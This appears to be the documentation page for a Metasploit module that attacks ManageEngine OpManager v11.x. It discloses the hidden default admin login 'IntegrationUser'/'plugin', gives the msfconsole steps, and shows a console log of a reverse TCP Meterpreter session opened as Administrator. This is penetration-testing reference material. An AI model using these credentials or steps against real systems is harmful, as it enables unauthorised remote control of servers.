Pearce Barry
2.2 KiB
2.2 KiB
Description
This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload.
Vulnerable Application
OpManager is an application designed around "integrated network management".
This module has been verified against the following OpManager versions:
- v11.0
- v11.4
- v11.5
- v11.6
Installers:
Verification Steps
- Start msfconsole
use exploit/windows/http/manage_engine_opmanager_rceset RHOST <IP addr of target system running OpManager>exploit- You should get a working Meterpreter session
Scenarios
Targeting Windows Server 2012 running OpManager v11.5
msf > use exploit/windows/http/manage_engine_opmanager_rce
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit
[*] Started reverse TCP handler on 10.0.2.4:4444
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : WIN-SI597APFOFH
OS : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows